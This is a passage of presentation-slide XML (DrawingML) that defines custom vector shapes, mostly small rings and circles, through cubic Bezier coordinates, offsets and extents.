                    <a:pt x="103" y="489"/>
                    <a:pt x="208" y="245"/>
                    <a:pt x="381" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="126"/>
                    <a:pt x="432" y="119"/>
                    <a:pt x="461" y="119"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="488" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="413" y="0"/>
                    <a:pt x="339" y="23"/>
                    <a:pt x="278" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="245"/>
                    <a:pt x="0" y="559"/>
                    <a:pt x="208" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="804"/>
                    <a:pt x="358" y="834"/>
                    <a:pt x="431" y="834"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="834"/>
                    <a:pt x="540" y="817"/>
                    <a:pt x="589" y="788"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="589" y="788"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="598" y="796"/>
                    <a:pt x="612" y="800"/>
                    <a:pt x="625" y="800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="731"/>
                    <a:pt x="937" y="420"/>
                    <a:pt x="834" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="766" y="77"/>
                    <a:pt x="626" y="0"/>
                    <a:pt x="48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2626325" y="995375"/>
              <a:ext cx="23450" cy="20950"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="838" w="938">
                  <a:moveTo>
                    <a:pt x="474" y="120"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="120"/>
                    <a:pt x="675" y="201"/>
                    <a:pt x="729" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="350"/>
                    <a:pt x="765" y="420"/>
                    <a:pt x="765" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="514"/>
                    <a:pt x="746" y="537"/>
                    <a:pt x="734" y="559"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="734" y="559"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="732" y="559"/>
                    <a:pt x="730" y="559"/>
                    <a:pt x="729" y="559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="667" y="684"/>
                    <a:pt x="567" y="747"/>
                    <a:pt x="466" y="747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="747"/>
                    <a:pt x="334" y="720"/>
                    <a:pt x="278" y="664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="489"/>
                    <a:pt x="209" y="248"/>
                    <a:pt x="381" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="126"/>
                    <a:pt x="443" y="120"/>
                    <a:pt x="474" y="120"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="489" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="414" y="0"/>
                    <a:pt x="339" y="23"/>
                    <a:pt x="278" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="248"/>
                    <a:pt x="0" y="559"/>
                    <a:pt x="209" y="734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="807"/>
                    <a:pt x="358" y="837"/>
                    <a:pt x="432" y="837"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="837"/>
                    <a:pt x="541" y="820"/>
                    <a:pt x="590" y="790"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="590" y="790"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="599" y="798"/>
                    <a:pt x="612" y="803"/>
                    <a:pt x="626" y="803"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="904" y="767"/>
                    <a:pt x="937" y="420"/>
                    <a:pt x="834" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="766" y="77"/>
                    <a:pt x="626" y="0"/>
                    <a:pt x="48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2681000" y="116392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76" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="1"/>
                    <a:pt x="1" y="70"/>
                    <a:pt x="1" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="278"/>
                    <a:pt x="70" y="348"/>
                    <a:pt x="176" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="348"/>
                    <a:pt x="315" y="278"/>
                    <a:pt x="315" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="70"/>
                    <a:pt x="245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2713175" y="1264675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103" y="0"/>
                    <a:pt x="0" y="70"/>
                    <a:pt x="0" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="314"/>
                    <a:pt x="103" y="417"/>
                    <a:pt x="209" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="417"/>
                    <a:pt x="417" y="314"/>
                    <a:pt x="417" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="70"/>
                    <a:pt x="312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2663625" y="1249875"/>
              <a:ext cx="23525" cy="20875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="835" w="941">
                  <a:moveTo>
                    <a:pt x="478" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="583" y="119"/>
                    <a:pt x="678" y="199"/>
                    <a:pt x="732" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="351"/>
                    <a:pt x="765" y="420"/>
                    <a:pt x="765" y="490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758" y="512"/>
                    <a:pt x="749" y="533"/>
                    <a:pt x="738" y="553"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="738" y="553"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="736" y="555"/>
                    <a:pt x="734" y="557"/>
                    <a:pt x="732" y="559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="730" y="564"/>
                    <a:pt x="728" y="569"/>
                    <a:pt x="727" y="574"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="727" y="574"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="696" y="625"/>
                    <a:pt x="657" y="667"/>
                    <a:pt x="616" y="708"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="616" y="708"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="574" y="733"/>
                    <a:pt x="527" y="746"/>
                    <a:pt x="479" y="746"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="408" y="746"/>
                    <a:pt x="335" y="718"/>
                    <a:pt x="279" y="662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="490"/>
                    <a:pt x="209" y="245"/>
                    <a:pt x="384" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="416" y="126"/>
                    <a:pt x="448" y="119"/>
                    <a:pt x="478" y="119"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="506" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="0"/>
                    <a:pt x="353" y="23"/>
                    <a:pt x="279" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="245"/>
                    <a:pt x="1" y="559"/>
                    <a:pt x="209" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="804"/>
                    <a:pt x="359" y="834"/>
                    <a:pt x="433" y="834"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="834"/>
                    <a:pt x="542" y="817"/>
                    <a:pt x="591" y="788"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="591" y="788"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="600" y="796"/>
                    <a:pt x="613" y="801"/>
                    <a:pt x="626" y="801"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="904" y="731"/>
                    <a:pt x="940" y="420"/>
                    <a:pt x="835" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="768" y="77"/>
                    <a:pt x="643" y="0"/>
                    <a:pt x="5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2814750" y="1231800"/>
              <a:ext cx="23500" cy="21175"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="847" w="940">
                  <a:moveTo>
                    <a:pt x="472" y="127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="578" y="127"/>
                    <a:pt x="682" y="210"/>
                    <a:pt x="732" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="343"/>
                    <a:pt x="765" y="448"/>
                    <a:pt x="765" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="760" y="533"/>
                    <a:pt x="754" y="547"/>
                    <a:pt x="747" y="560"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="747" y="560"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="561"/>
                    <a:pt x="732" y="570"/>
                    <a:pt x="732" y="587"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="732" y="587"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="697" y="639"/>
                    <a:pt x="648" y="672"/>
                    <a:pt x="600" y="719"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="600" y="719"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="558" y="743"/>
                    <a:pt x="514" y="756"/>
                    <a:pt x="469" y="756"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="756"/>
                    <a:pt x="335" y="726"/>
                    <a:pt x="279" y="657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="518"/>
                    <a:pt x="209" y="273"/>
                    <a:pt x="348" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="140"/>
                    <a:pt x="430" y="127"/>
                    <a:pt x="472" y="127"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="463" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="1"/>
                    <a:pt x="335" y="20"/>
                    <a:pt x="279" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="240"/>
                    <a:pt x="1" y="551"/>
                    <a:pt x="209" y="760"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="819"/>
                    <a:pt x="356" y="846"/>
                    <a:pt x="428" y="846"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486" y="846"/>
                    <a:pt x="542" y="829"/>
                    <a:pt x="592" y="798"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="592" y="798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="597" y="802"/>
                    <a:pt x="602" y="804"/>
                    <a:pt x="608" y="804"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="613" y="804"/>
                    <a:pt x="620" y="802"/>
                    <a:pt x="626" y="796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="870" y="760"/>
                    <a:pt x="940" y="412"/>
                    <a:pt x="834" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="740" y="87"/>
                    <a:pt x="599" y="1"/>
                    <a:pt x="46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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3113525" y="1375125"/>
              <a:ext cx="22600" cy="21550"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="862" w="904">
                  <a:moveTo>
                    <a:pt x="464" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="126"/>
                    <a:pt x="645" y="207"/>
                    <a:pt x="695" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="731" y="376"/>
                    <a:pt x="764" y="446"/>
                    <a:pt x="731" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="731" y="610"/>
                    <a:pt x="647" y="646"/>
                    <a:pt x="579" y="729"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="579" y="729"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="542" y="746"/>
                    <a:pt x="503" y="756"/>
                    <a:pt x="462" y="756"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="756"/>
                    <a:pt x="314" y="725"/>
                    <a:pt x="245" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="515"/>
                    <a:pt x="209" y="274"/>
                    <a:pt x="347" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="139"/>
                    <a:pt x="426" y="126"/>
                    <a:pt x="464" y="126"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="452" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="0"/>
                    <a:pt x="312" y="20"/>
                    <a:pt x="245" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="237"/>
                    <a:pt x="0" y="552"/>
                    <a:pt x="175" y="760"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="831"/>
                    <a:pt x="325" y="862"/>
                    <a:pt x="402" y="862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="862"/>
                    <a:pt x="518" y="844"/>
                    <a:pt x="570" y="814"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="570" y="814"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="823"/>
                    <a:pt x="597" y="829"/>
                    <a:pt x="625" y="829"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="870" y="760"/>
                    <a:pt x="903" y="413"/>
                    <a:pt x="800" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="729" y="86"/>
                    <a:pt x="596" y="0"/>
                    <a:pt x="452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3361900" y="880350"/>
              <a:ext cx="23500" cy="21325"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="853" w="940">
                  <a:moveTo>
                    <a:pt x="445" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="135"/>
                    <a:pt x="678" y="217"/>
                    <a:pt x="732" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="366"/>
                    <a:pt x="765" y="435"/>
                    <a:pt x="732" y="505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="732" y="593"/>
                    <a:pt x="658" y="656"/>
                    <a:pt x="614" y="715"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="614" y="715"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="568" y="747"/>
                    <a:pt x="517" y="763"/>
                    <a:pt x="467" y="763"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="763"/>
                    <a:pt x="334" y="735"/>
                    <a:pt x="279" y="680"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="505"/>
                    <a:pt x="209" y="263"/>
                    <a:pt x="348" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="142"/>
                    <a:pt x="412" y="135"/>
                    <a:pt x="445" y="135"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="479" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="1"/>
                    <a:pt x="340" y="27"/>
                    <a:pt x="279" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="227"/>
                    <a:pt x="1" y="574"/>
                    <a:pt x="209" y="749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="822"/>
                    <a:pt x="359" y="852"/>
                    <a:pt x="433" y="852"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="852"/>
                    <a:pt x="542" y="835"/>
                    <a:pt x="591" y="806"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="591" y="806"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="814"/>
                    <a:pt x="613" y="819"/>
                    <a:pt x="626" y="819"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="870" y="749"/>
                    <a:pt x="940" y="435"/>
                    <a:pt x="801" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="732" y="92"/>
                    <a:pt x="607" y="1"/>
                    <a:pt x="47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3550400" y="589850"/>
              <a:ext cx="13025" cy="11750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="470" w="521">
                  <a:moveTo>
                    <a:pt x="269" y="76"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="76"/>
                    <a:pt x="358" y="125"/>
                    <a:pt x="381" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="210"/>
                    <a:pt x="417" y="244"/>
                    <a:pt x="417" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="349"/>
                    <a:pt x="348" y="383"/>
                    <a:pt x="312" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="419"/>
                    <a:pt x="312" y="420"/>
                    <a:pt x="312" y="421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="312" y="421"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="297" y="426"/>
                    <a:pt x="282" y="428"/>
                    <a:pt x="266" y="428"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="428"/>
                    <a:pt x="182" y="412"/>
                    <a:pt x="139" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="280"/>
                    <a:pt x="103" y="141"/>
                    <a:pt x="209" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="84"/>
                    <a:pt x="250" y="76"/>
                    <a:pt x="269" y="76"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="249" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="1"/>
                    <a:pt x="173" y="12"/>
                    <a:pt x="139" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="141"/>
                    <a:pt x="1" y="313"/>
                    <a:pt x="103" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="455"/>
                    <a:pt x="181" y="469"/>
                    <a:pt x="221" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="469"/>
                    <a:pt x="284" y="460"/>
                    <a:pt x="314" y="444"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="314" y="444"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="452"/>
                    <a:pt x="326" y="452"/>
                    <a:pt x="348" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="419"/>
                    <a:pt x="520" y="244"/>
                    <a:pt x="451" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="48"/>
                    <a:pt x="327" y="1"/>
                    <a:pt x="24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2611525" y="679325"/>
              <a:ext cx="13100" cy="11750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="470" w="524">
                  <a:moveTo>
                    <a:pt x="269" y="77"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="77"/>
                    <a:pt x="359" y="126"/>
                    <a:pt x="384" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="208"/>
                    <a:pt x="417" y="244"/>
                    <a:pt x="417" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="317"/>
                    <a:pt x="395" y="346"/>
                    <a:pt x="369" y="370"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="369" y="370"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="402"/>
                    <a:pt x="292" y="419"/>
                    <a:pt x="249" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="419"/>
                    <a:pt x="177" y="408"/>
                    <a:pt x="139" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="278"/>
                    <a:pt x="106" y="139"/>
                    <a:pt x="209" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="85"/>
                    <a:pt x="250" y="77"/>
                    <a:pt x="269" y="77"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="253" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="1"/>
                    <a:pt x="175" y="13"/>
                    <a:pt x="139" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="139"/>
                    <a:pt x="1" y="314"/>
                    <a:pt x="106" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="454"/>
                    <a:pt x="187" y="469"/>
                    <a:pt x="232" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="469"/>
                    <a:pt x="293" y="462"/>
                    <a:pt x="320" y="449"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="320" y="449"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="453"/>
                    <a:pt x="333" y="453"/>
                    <a:pt x="348" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="417"/>
                    <a:pt x="523" y="244"/>
                    <a:pt x="454" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="407" y="47"/>
                    <a:pt x="331" y="1"/>
                    <a:pt x="25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2570750" y="649975"/>
              <a:ext cx="13000" cy="12150"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="486" w="520">
                  <a:moveTo>
                    <a:pt x="269" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="69"/>
                    <a:pt x="357" y="119"/>
                    <a:pt x="381" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="201"/>
                    <a:pt x="417" y="237"/>
                    <a:pt x="417" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="340"/>
                    <a:pt x="348" y="376"/>
                    <a:pt x="311" y="410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="413"/>
                    <a:pt x="311" y="417"/>
                    <a:pt x="311" y="420"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="311" y="420"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="423"/>
                    <a:pt x="288" y="424"/>
                    <a:pt x="275" y="424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="424"/>
                    <a:pt x="185" y="407"/>
                    <a:pt x="139" y="376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="271"/>
                    <a:pt x="103" y="168"/>
                    <a:pt x="209" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="78"/>
                    <a:pt x="249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199" y="1"/>
                    <a:pt x="168" y="9"/>
                    <a:pt x="139" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="132"/>
                    <a:pt x="0" y="307"/>
                    <a:pt x="103" y="410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="463"/>
                    <a:pt x="189" y="485"/>
                    <a:pt x="233" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262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0" y="459"/>
                    <a:pt x="322" y="459"/>
                    <a:pt x="324" y="459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="459"/>
                    <a:pt x="337" y="455"/>
                    <a:pt x="348" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="410"/>
                    <a:pt x="520" y="237"/>
                    <a:pt x="450" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400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3485225" y="1249050"/>
              <a:ext cx="10450" cy="10425"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="417" w="418">
                  <a:moveTo>
                    <a:pt x="209" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="0"/>
                    <a:pt x="1" y="106"/>
                    <a:pt x="1" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="347"/>
                    <a:pt x="106" y="417"/>
                    <a:pt x="209" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="417"/>
                    <a:pt x="418" y="347"/>
                    <a:pt x="418" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="106"/>
                    <a:pt x="348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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3353225" y="123605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0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="0"/>
                    <a:pt x="0" y="70"/>
                    <a:pt x="0" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="312"/>
                    <a:pt x="70" y="417"/>
                    <a:pt x="209" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="417"/>
                    <a:pt x="417" y="312"/>
                    <a:pt x="417" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="70"/>
                    <a:pt x="314" y="0"/>
                    <a:pt x="20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2971075" y="1280300"/>
              <a:ext cx="10450" cy="10450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="418" w="418">
                  <a:moveTo>
                    <a:pt x="209" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="1"/>
                    <a:pt x="1" y="106"/>
                    <a:pt x="1" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="315"/>
                    <a:pt x="70" y="418"/>
                    <a:pt x="209" y="418"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="418"/>
                    <a:pt x="418" y="315"/>
                    <a:pt x="418" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="106"/>
                    <a:pt x="315" y="1"/>
                    <a:pt x="209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3506975" y="1206650"/>
              <a:ext cx="12175" cy="12200"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="488" w="487">
                  <a:moveTo>
                    <a:pt x="256" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="69"/>
                    <a:pt x="358" y="118"/>
                    <a:pt x="381" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="204"/>
